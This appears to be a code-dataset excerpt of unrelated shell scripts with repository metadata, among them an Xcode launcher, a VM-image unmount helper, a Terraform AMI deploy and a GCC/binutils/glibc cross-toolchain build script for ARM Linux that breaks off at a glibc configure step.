# Print an error message to stderr in bold red.
error(){
  red="\e[1;31m"
  reset="\e[0m"
  # %b expands the backslash escapes held in red/reset around the message.
  printf '%b%s%b\n' "$red" "$1" "$reset" >&2
}
# Print an informational message to stdout.
info(){
  printf "%s\n" "$1"
}

usage='xcode-open
Open a directory with Xcode

usage: xcode-open [-h | --help] [--current | --beta] [PATH]

  -h | --help    Print this usage documentation and exit
  --current      DEFAULT - Use the currently selected Xcode version.
  --beta         Use the newest beta version of Xcode.

  PATH           The path to the directory containing the Xcode project.
                 If not provided, will default to the current directory.
'

# Default: the currently selected Xcode (as reported by xcode-version).
app=$(xcode-version --path)

# First pass: pick the Xcode application and consume the flag.
case $1 in
  --current)
    shift
    ;;
  --beta)
    # Newest installed beta: highest-sorting entry containing "beta".
    app=$(xcode-list | sort -r | grep -m 1 'beta')
    shift
    ;;
esac

# Second pass: a second version flag or a help flag in the remaining args.
case $1 in
  --current|--beta)
    error "Invalid configuration, can't specify multiple Xcode applications"
    exit 1
    ;;
  --help|-h)
    info "$usage"
    exit 0
    ;;
esac

# Remaining argument is the project path; default to the current directory.
target=${1:-"."}

open -a "$app" "$target"
| true
|
9c82921940ab4aee38ffd2817d5a47c4e691defa
|
Shell
|
FlorianHeigl/wp3-image-synthesis
|
/image-optimizer/src/main/resources/scripts/umountImage.sh
|
UTF-8
| 1,134
| 3.46875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Copyright 2009-10 Gabor Kecskemeti, University of Westminster, MTA SZTAKI
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Unmounts a VM image previously attached via qemu-nbd/LVM: unmount the
# mount point, deactivate its volume group, and kill the serving qemu-nbd.
# Parameters:
#  1. complete path to the VMI to be mounted
#  2. mount point

if [ "$#" -ne 2 ]; then
	echo "Illegal number of parameters"
	exit 243
fi

modprobe nbd

SOURCE_IMGFN=$1
MOUNT_TARGET=$2

#Original VA handling
# Extract the LVM volume-group name from the mounted device path: field 4 of
# the device (split on /), up to the first '-'.
# NOTE(review): presumably a /dev/mapper/<vg>-<lv> style path -- confirm.
VOLID=`mount | grep "$MOUNT_TARGET" | cut -f1 -d' ' | cut -f4 -d/ | cut -f1 -d-`
umount $MOUNT_TARGET
# Deactivate the volume group so the nbd device can be released.
vgchange -an $VOLID &> /dev/null
IMGFNBASENAME=`basename $SOURCE_IMGFN`
# Find the qemu-nbd process serving this image file (awk filters the ps
# listing, excluding the awk process itself) and terminate it.
nbdpid=`ps ux | awk "/qemu-nbd/&&/$IMGFNBASENAME/&&!/awk/ { print \\$2 } "`
kill $nbdpid
| true
|
3a179c009826153f5e05147b70126b7806c85a6a
|
Shell
|
siberblog/linux
|
/hands-on/arg.sh
|
UTF-8
| 158
| 2.984375
| 3
|
[] |
no_license
|
#! /bin/bash
# Prompt for a birth year on stdin and print the age relative to the year
# passed as $1.
clear

# yasi_yaz <reference-year>: read a birth year and echo the computed age.
yasi_yaz(){
    local dogum_yili
    read -p "Dogum yili giriniz: " dogum_yili
    # Fix: use arithmetic expansion instead of the deprecated `let`; with
    # `let yas=$1-$dogum_yili`, an empty input produced a syntax error,
    # whereas an empty variable evaluates to 0 inside $(( )).
    local yas
    yas=$(( $1 - dogum_yili ))
    echo "$yas"
}

yasi_yaz 2020
| true
|
143b655ffd338d06c8c072d8860b1c062b1811a8
|
Shell
|
snailium/nanopi_tryout
|
/duo/00_prepare.sh
|
UTF-8
| 157
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/bash
# Install base build utilities, prefixing package commands with sudo when not
# already running as root.

SUDO=
[[ $(whoami) == "root" ]] || SUDO=sudo

# Install utilities
$SUDO apt-get update
$SUDO apt-get install -y git build-essential
| true
|
c4f22808c872d7fc9eeec3eefe8b36710c014f1a
|
Shell
|
WorkloadAutomation/WADemo
|
/setup.sh
|
UTF-8
| 437
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
#############################################################################
# Licensed Materials - Property of HCL*
# (C) Copyright HCL Technologies Ltd. 2017, 2018 All rights reserved.
# * Trademark of HCL Technologies Limited
#############################################################################

# Run each component's setup script from the directory this script lives in.
# basedir stays exported because the per-component scripts may read it.
export basedir=$(dirname "$0")

# Components are installed in dependency order.
components="common docker agents"

for c in $components; do
    # Fix: abort the whole setup if any component fails instead of silently
    # continuing with a half-installed system.
    "$basedir/${c}/setup.sh" || exit 1
done
| true
|
54ff337d442393cb765dccf806bc140d3f1ee211
|
Shell
|
webclinic017/gotolong
|
/gotolong/corpact/corpact_invoke.sh
|
UTF-8
| 941
| 2.78125
| 3
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# Run the corpact report generator, resolving input/output locations from the
# gotolong configuration module.

# Logging level comes from the environment, defaulting to INFO when unset or
# empty (same semantics as the original test -n if/else).
LOGGING_LEVEL=${GOTOLONG_LOGGING_LEVEL:-INFO}

# Resolve configured data/report directories.
CONFIG_GLOBAL_DATA_LOC=$(python -m gotolong.config.config_ini global_data)
CONFIG_GLOBAL_REPORTS_LOC=$(python -m gotolong.config.config_ini global_reports)
CONFIG_PROFILE_DATA_LOC=$(python -m gotolong.config.config_ini profile_data)
CONFIG_PROFILE_REPORTS_LOC=$(python -m gotolong.config.config_ini profile_reports)

# figure this out automatically
IN_FILE_1=$CONFIG_GLOBAL_REPORTS_LOC/bse-reports/all/bse-all-corpact.csv
OUT_FILE_1=$CONFIG_GLOBAL_REPORTS_LOC/corpact-reports/corpact-reports-phase-1.csv
OUT_FILE_2=$CONFIG_GLOBAL_REPORTS_LOC/corpact-reports/corpact-reports-phase-1.txt

# python amfi_invoke.py --debug_level ${DEBUG_LEVEL} --in_files ${IN_FILE} --out_files ${OUT_FILE_1}
python corpact.py -t -l ${LOGGING_LEVEL} -i ${IN_FILE_1} -o ${OUT_FILE_1} ${OUT_FILE_2}
# csv2html -o test.html test/test.csv
| true
|
979045a577fb2fbcf34e0cc8a17e946e505da0c5
|
Shell
|
faulke/weather-infra
|
/terraform/prod/deploy.sh
|
UTF-8
| 620
| 3.34375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Deploy the AMI tagged with version $1 via Terraform.
# Usage: deploy.sh <ami-version-tag>

echo "$1"

# initialize ami id variable
AMI="None"

# Poll until the AMI tagged with this version is registered. Fix: "$AMI" is
# quoted -- the unquoted test broke (unary-operator error) whenever the aws
# CLI returned an empty or multi-word result.
until [ "$AMI" != "None" ]; do
  echo "Fetching AMI."
  AMI="$(aws ec2 describe-images --filters Name=tag:Version,Values="$1" --query Images[0].[ImageId] --output text)"
  # Back off between polls instead of hammering the EC2 API in a tight loop.
  if [ "$AMI" = "None" ]; then
    sleep 5
  fi
done

echo "$AMI"

# get modules
terraform get
# get tfstate from s3 backend
terraform init
# validate plan
terraform plan -var ami="$AMI" -var access_key="$AWS_ACCESS_KEY_ID" -var secret_key="$AWS_SECRET_ACCESS_KEY"
# apply plan -- deploy
terraform apply -var ami="$AMI" -var access_key="$AWS_ACCESS_KEY_ID" -var secret_key="$AWS_SECRET_ACCESS_KEY"
| true
|
f597402d3e1f0a1625e7c79afae7c465d6ea9802
|
Shell
|
jief666/GccBuild
|
/BuildScripts/Build-gcc-493-osx_cross_arm-linux-30228
|
UTF-8
| 26,024
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/bash
# Do not define var in this script. Define tham all in SetupEnv-$BUILDGCC_SUFFIX.
# The goal is to be able to copy and paste command from this script to a console. Helped me a lot when debugging step by step
if [ -z "$BUILDGCC_BUILD_DIR" ]
then
echo BUILDGCC_BUILD_DIR not defined
exit 1
fi
#[ -z "$BUILDGCC_SYSTEM_HEADER_DIR" -a -d "/JiefLand/5.Devel" ] && export BUILDGCC_SYSTEM_HEADER_DIR=/JiefLand/5.Devel/Syno/DSM6.0/ds.armada370-6.0.dev/usr/local/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sysroot/usr/include
#[ -z "$BUILDGCC_SYSTEM_HEADER_DIR" -a -d "/Volumes/5.Devel" ] && export BUILDGCC_SYSTEM_HEADER_DIR=/Volumes/5.Devel/Syno/DSM6.0/ds.armada370-6.0.dev/usr/local/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sysroot/usr/include
#if [ -z "$BUILDGCC_SYSTEM_HEADER_DIR" ]
#then
# echo Please define BUILDGCC_SYSTEM_HEADER_DIR to the path of target system includes.
# exit 1
#fi
# ulimit maybe not needed.
ulimit -n 1024
set -u -o pipefail
#If every component are already sucessfully built, "$BUILDGCC_BUILD_DIR"/make_sucessfully.done will be recreated immediately.
[ -f "$BUILDGCC_BUILD_DIR"/make_sucessfully.done ] && rm "$BUILDGCC_BUILD_DIR"/make_sucessfully.done
mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM
mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr
# on Lion, we must specify destination name ('include') even if it's the same
[[ ! -L "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr/include ]] && ln -s ../include/ "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr/include
mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/include
"$BUILDGCC_BUILDSCRIPTS"/Extract "include_linux-dsm6.0" $TARGET_PLATFORM/include linux || exit 1
"$BUILDGCC_BUILDSCRIPTS"/Extract "include_asm-dsm6.0" $TARGET_PLATFORM/include asm || exit 1
"$BUILDGCC_BUILDSCRIPTS"/Extract "include_asm-generic-dsm6.0" $TARGET_PLATFORM/include asm-generic || exit 1
echo *-*-*-*------------------------------------------------------------------ GMP ------------------------------------------------------------------------
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build/make_sucessfully.done ]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$GMP_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build
#--disable-assembly <- needed for isl
#had to put flags in CC (instead of CFLAGS) variable so they are used when configure do the "check how to run preprocessor"
../$GMP_SOURCES_DIR/configure CPPFLAGS="-fexceptions" \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--enable-cxx \
--disable-shared \
--disable-assembly \
--with-pic \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ GMP failed ------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ MPFR ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$MPFR_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build
../$MPFR_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-gmp="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--disable-shared \
2>&1 | tee configure-stdout.log
# --enable-shared \ <- error illegal text-relocation to '___gmp_binvert_limb_table'
#--disable-assembly \ <- not recognized
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ MPFR failed ------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ MPC ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$MPC_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build
../$MPC_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--disable-shared \
--with-gmp="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-mpfr="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ MPC failed ------------------------------------------------------------------------
exit 1
fi
if [ ! -z "${ELF_SOURCES_DIR-}" ]
then
echo *-*-*-*------------------------------------------------------------------ ELF ------------------------------------------------------------------------
if [[ ! -f "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$ELF_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build
../$ELF_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ ELF failed------------------------------------------------------------------------
exit 1
fi
fi
# --- ISL: integer set library (Graphite loop optimizations for GCC) --------
# Runs only after MPC finished; its shared libs are also copied into the
# target's dylib directory.
echo "*-*-*-*------------------------------------------------------------------ ISL ------------------------------------------------------------------------"
if [[ -f "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build/make_sucessfully.done ]]; then
    "$BUILDGCC_BUILDSCRIPTS"/Extract "$ISL_SOURCES_DIR" || exit 1
    rm -rf "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build
    mkdir "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build
    cd "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build
    ../$ISL_SOURCES_DIR/configure \
        CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        --prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-gmp-prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-pic=PIC \
        2>&1 | tee configure-stdout.log
    if [[ -f config.status ]]; then
        # Bug fix: "$?" after "cmd | tee" is tee's status; use PIPESTATUS[0]
        # so a failed make/install actually blocks the .done marker.
        make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
        #[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && make install 2>&1 | tee make-install-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/dylib
        [[ $? == 0 ]] && cp -a "$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM/lib/libisl* "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/dylib
        [[ $? == 0 ]] && touch make_sucessfully.done
    fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build/make_sucessfully.done ]
then
    echo "*-*-*-*------------------------------------------------------------------ ISL failed------------------------------------------------------------------------"
    exit 1
fi
# --- Cloog: code generator for the polyhedral model (GCC Graphite) ---------
echo "*-*-*-*------------------------------------------------------------------ Cloog ------------------------------------------------------------------------"
if [[ -f "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build/make_sucessfully.done ]]; then
    "$BUILDGCC_BUILDSCRIPTS"/Extract "$CLOOG_SOURCES_DIR" || exit 1
    rm -rf "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build
    mkdir "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build
    cd "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build
    ../$CLOOG_SOURCES_DIR/configure \
        CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        --prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --disable-shared \
        --with-gmp-prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-isl-prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        2>&1 | tee configure-stdout.log
    if [[ -f config.status ]]; then
        # Bug fix: check the make stage (PIPESTATUS[0]), not tee's "$?".
        make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
        #[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && make install 2>&1 | tee make-install-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && touch make_sucessfully.done
    fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build/make_sucessfully.done ]
then
    echo "*-*-*-*------------------------------------------------------------------ Cloog failed------------------------------------------------------------------------"
    exit 1
fi
# --- BINUTILS: cross assembler/linker for $TARGET_PLATFORM -----------------
echo "*-*-*-*------------------------------------------------------------------ BINUTILS ------------------------------------------------------------------------"
if [[ -f "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build/make_sucessfully.done ]]; then
    "$BUILDGCC_BUILDSCRIPTS"/Extract "$BINUTILS_SOURCES_DIR" || exit 1
    rm -rf "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build
    mkdir "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build
    cd "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build
    ../$BINUTILS_SOURCES_DIR/configure \
        CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        --disable-werror \
        --prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
        --target=$TARGET_PLATFORM \
        --with-sysroot \
        --disable-multilib \
        --enable-poison-system-directories \
        2>&1 | tee configure-stdout.log
    if [[ -f config.status ]]; then
        # Bug fix: check the make stage (PIPESTATUS[0]), not tee's "$?".
        make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && make install 2>&1 | tee make-install-stdout.log
        if [[ ${PIPESTATUS[0]} == 0 ]]
        then
            echo "update_all_lib_path"
            update_all_lib_path "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM
            [[ $? == 0 ]] && touch make_sucessfully.done
        fi
    fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build/make_sucessfully.done ]
then
    echo "*-*-*-*------------------------------------------------------------------ BINUTILS failed------------------------------------------------------------------------"
    exit 1
fi
# --- GCC cross stage 1: minimal C-only compiler + libgcc (no libc yet) -----
echo "*-*-*-*------------------------------------------------------------------ GCC cross1 ------------------------------------------------------------------------"
if [[ -f "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build/make_sucessfully.done ]]; then
    "$BUILDGCC_BUILDSCRIPTS"/Extract "$GCC_SOURCES_DIR" || exit 1
    #to avoid : checking for shl_load... configure: error: Link tests are not allowed after GCC_NO_EXECUTABLES.
    #./$GCC_SOURCES_DIR/libtool.m4
    # delete line 5279 (LT_SYS_DLOPEN_SELF)
    #./$GCC_SOURCES_DIR/gcc/cp/Make-lang.in
    # line 73 :
    # CXX_C_OBJS = attribs.o c-common.o c-format.o c-pragma.o c-semantics.o c-lex.o \
    #  c-dump.o $(CXX_TARGET_OBJS) c-pretty-print.o c-opts.o c-pch.o \
    #  incpath.o cppdefault.o c-ppoutput.o c-cppbuiltin.o prefix.o \
    #  c-gimplify.o c-omp.o tree-inline.o
    # -> remove cppdefault.o & tree-inline.o
    rm -rf "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build
    mkdir "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build
    cd "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build
    #--disable-threads -> to enable thread, pthread.h is needed.
    # --with-sysroot="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
    ../$GCC_SOURCES_DIR/configure \
        CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        --target=$TARGET_PLATFORM \
        --prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
        --enable-languages=c \
        --enable-werror=no \
        --with-arch=armv7-a \
        --with-float=hard \
        --disable-threads \
        --disable-multilib \
        --disable-libmudflap \
        --disable-libssp \
        --disable-libatomic \
        --disable-libitm \
        --disable-libquadmath \
        --disable-libsanitizer \
        --disable-libvtv \
        --disable-libcilkrts \
        --disable-libstdcxx \
        --disable-libstdcxx-pch \
        --disable-libgomp \
        --disable-shared \
        --disable-lto \
        --disable-nls \
        --without-ppl \
        --enable-poison-system-directories \
        --with-gmp="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-mpfr="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-mpc="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-isl="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-cloog="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --without-headers \
        2>&1 | tee configure-stdout.log
    if [[ -f config.status ]]; then
        # Bug fix: every step below was gated on tee's "$?"; use PIPESTATUS[0]
        # so a failed make stage actually stops the chain.
        make $BUILDGCC_MAKEJOBS all-gcc 2>&1 | tee make-all-gcc-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && make install-gcc 2>&1 | tee make-install-gcc-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && make $BUILDGCC_MAKEJOBS all-target-libgcc 2>&1 | tee make-all-target-libgcc-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && make install-target-libgcc 2>&1 | tee make-install-target-libgcc-stdout.log # this install crtbegin.o etc.
        [[ ${PIPESTATUS[0]} == 0 ]] && touch make_sucessfully.done
    fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build/make_sucessfully.done ]
then
    echo "*-*-*-*------------------------------------------------------------------ GCC cross 1 failed------------------------------------------------------------------------"
    exit 1
fi
# --- GLIBC headers: install libc headers so stage-2 GCC can be built -------
echo "*-*-*-*------------------------------------------------------------------ GLIBC Headers ------------------------------------------------------------------------"
if [[ -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build/make_sucessfully.done ]]; then
    "$BUILDGCC_BUILDSCRIPTS"/Extract "$GLIBC_SOURCES_DIR" || exit 1
    rm -rf "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build
    mkdir "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build
    cd "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build
    # Patch sysd-rules.awk: newer gawk requires a numeric "how" arg to gensub().
    cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/scripts/sysd-rules.awk "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/scripts/sysd-rules.orig
    patch -o "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/scripts/sysd-rules.awk "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/scripts/sysd-rules.orig <<"END_OF_PATCH"
--- scripts/sysd-rules.awk
+++ scripts/sysd-rules.awk.new
@@ -53,7 +53,7 @@ BEGIN {
   if (target_pattern == "%") {
     command_suffix = "";
   } else {
-    prefix = gensub(/%/, "", "", target_pattern);
+    prefix = gensub(/%/, "", 1, target_pattern);
     command_suffix = " $(" prefix "CPPFLAGS)";
   }
   target = "$(objpfx)" target_pattern o ":";
END_OF_PATCH
    #cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/Makefile "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/Makefile.orig
    #sed '167s|$(BUILD_CC) $^ $(BUILD_LDFLAGS) -o $@|$(BUILD_CC) $^ $(BUILD_LDFLAGS) -lintl -o $@|' "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/Makefile.orig \
    #	| sed '167s/-lintl//' \
    #	>"$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/Makefile
    # Strip libintl/locale usage out of the host-built rpcgen helper.
    cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c.orig
    sed '41s|^#include <libintl.h>|//#include <libintl.h>|' "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c.orig \
        | sed '56s|^|#define _(str) str|' \
        | sed '177s|^ setlocale|// setlocale|' \
        | sed '178s|^ textdomain|// textdomain|' \
        >"$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c
    #cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c.orig
    #sed '40s|#include <libintl.h>|//#include <libintl.h>|' "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c.orig \
    #	>"$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c
    ../$GLIBC_SOURCES_DIR/configure \
